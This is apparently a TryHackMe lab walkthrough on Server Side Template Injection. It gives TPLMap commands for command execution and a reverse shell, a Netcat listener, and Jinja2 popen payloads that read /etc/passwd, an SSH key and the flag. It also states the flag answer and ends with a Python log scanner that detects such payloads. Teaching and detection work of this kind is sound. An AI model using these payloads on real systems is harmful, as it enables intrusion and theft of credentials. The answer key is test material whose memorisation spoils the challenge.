Introduction
In this walkthrough, we covered manual and automatic methods to detect Server Side Template Injection, or SSTI. We used the ZTH: Obscure Web Vulns room from TryHackMe.
SSTI or Server Side Template Injection
First off, what exactly is SSTI? I learned that it’s a vulnerability that can occur when a web application uses a template engine to generate dynamic content, but it doesn’t properly sanitize the user’s input. This means that if you can inject code into the template, the server will execute it. Think of it like this: if a website is building a page using a template and it takes your name to display a friendly “Hello, [Your Name]!”, an SSTI vulnerability would allow you to insert code instead of your name, and the server would run it.
I found that this type of vulnerability is common in applications like wikis, blogs, and content management systems. A great way to test for it is to use a simple arithmetic expression like {{2+2}}. If the website displays “4” instead of “{{2+2}}”, you’ve likely found an SSTI vulnerability. For anyone wanting to dig deeper, I highly recommend checking out the articles on PortSwigger’s website.
Putting Theory into Practice
I found a web application to test my newfound knowledge. It had a simple input box that asked, “What is two plus two?”. When I typed “4”, it confirmed the correct answer. By looking at the page source, I could see that my input was being taken and displayed back to me. This was the perfect place to try out some SSTI payloads.
Automatic Exploitation with TPLMap
To start, I decided to use a tool called TPLMap, which is designed specifically for finding and exploiting SSTI. It’s a powerful tool that can automate the entire process.
I ran TPLMap against the vulnerable URL and pointed it to the parameter I suspected was vulnerable. The tool quickly confirmed that the application was using the Jinja2 template engine and that it was indeed vulnerable. TPLMap even showed me that I could get a shell on the server!
To test this, I used TPLMap to execute the id command on the server, and it worked perfectly, showing me the user ID. Next, I set up a Netcat listener on my own machine and used TPLMap to get a reverse shell, giving me direct command-line access to the server.
Manual Exploitation
After seeing how easy it was with a tool, I wanted to try exploiting the vulnerability manually. I went back to the web application and entered {{2+2}} into the input box. As expected, the page returned “4”.
I then tried a more advanced payload to see if I could read files from the server. I used a payload designed to execute commands and read the /etc/passwd file. It worked! The contents of the file were displayed right there on the web page. I also tried to read an SSH private key, but that attempt resulted in an error.
The Final Challenge
The video I was following concluded with a challenge: find a flag located at /flag on the server. I decided to try both my automatic and manual methods.
First, I used TPLMap with a command to read the /flag file. It immediately returned the flag: “cocktails”.
Then, for the manual approach, I used my file-reading payload and simply replaced /etc/passwd with /flag. And just like that, the flag “cocktails” was displayed on the page.
Technical Commands Used
Here are the technical commands I used on the terminal during this process:
python2 tplmap.py -u <URL> -d name
- This command runs TPLMap to test a URL for SSTI, specifying the vulnerable parameter with the -d flag.
python2 tplmap.py -u <URL> -d name --os-cmd id
- This command uses TPLMap to execute the id command on the target server.
nc -lvp 4545
- This sets up a Netcat listener on port 4545, waiting for an incoming connection (like a reverse shell).
python2 tplmap.py -u <URL> -d name --os-shell
- This command instructs TPLMap to attempt to establish a reverse shell to a specified IP and port.
python2 tplmap.py -u <URL> -d name --os-cmd "cat /etc/passwd"
- This command uses TPLMap to read the /etc/passwd file from the server.
{{_self.0.popen('cat /etc/passwd').read()}}
- This is a manual SSTI payload for Jinja2 that executes the cat /etc/passwd command and displays the output.
{{_self.0.popen('cat /home/test/.ssh/id_rsa').read()}}
- A manual payload to attempt to read an SSH private key.
python2 tplmap.py -u <URL> -d name --os-cmd "cat /flag"
- The TPLMap command used to automatically find and display the challenge flag.
{{_self.0.popen('cat /flag').read()}}
- The manual payload used to find and display the challenge flag.
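From the defender's side, the same two things this walkthrough used, the {{2+2}} detection probe and the Jinja2 popen payloads listed above, are what you would look for in web server logs. The following is an added example written for this page, not code from the room, the video or TPLMap: it parses constructed access log lines, URL-decodes each query parameter, and labels values as an arithmetic probe, an execution attempt, or a bare template expression. Parameter names, IP addresses and the log lines themselves are made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Expression delimiters of common template engines; Jinja2's {{ }} is the
# engine identified on this page, the others let one scan cover other stacks.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%.*?%>", re.S)
# The detection probe used in the write-up: a bare arithmetic expression.
ARITH_PROBE = re.compile(r"^\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}$")
# Tokens taken from the Jinja2 payloads shown above; extend for your own app.
EXEC_TOKENS = re.compile(r"popen|_self", re.I)
# Request line of an Apache/nginx combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_value(value):
    """Label a decoded parameter value: 'exec-attempt', 'arith-probe', 'template-expr' or None."""
    decoded = unquote(value)  # parse_qs decoded once; this catches double-encoding
    exprs = TEMPLATE_EXPR.findall(decoded)
    if not exprs:
        return None
    if any(EXEC_TOKENS.search(e) for e in exprs):
        return "exec-attempt"
    if any(ARITH_PROBE.match(e.strip()) for e in exprs):
        return "arith-probe"
    return "template-expr"

def scan_access_log(lines):
    """Return (param, label, decoded_value) for each flagged query parameter.
    POST bodies never reach the access log; feed application or WAF logs for those."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for v in values:
                label = classify_value(v)
                if label:
                    hits.append((param, label, unquote(v)))
    return hits

# Constructed sample log lines (not taken from the room or the write-up).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?name=4 HTTP/1.1" 200 312',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=%7B%7B2%2B2%7D%7D HTTP/1.1" 200 312',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=%7B%7B_self.0.popen(%27cat%20/etc/passwd%27).read()%7D%7D HTTP/1.1" 200 1890',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?name=%7Bbob%7D HTTP/1.1" 200 312',
]
if __name__ == "__main__":
    for param, label, value in scan_access_log(SAMPLE_LOG):
        print(f"{label:14} {param}={value}")
```

A single-brace value like {bob} is deliberately not flagged, and a hit for "arith-probe" followed by "exec-attempt" from the same source is the sequence this walkthrough itself produced.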
Room Answers
What is the flag?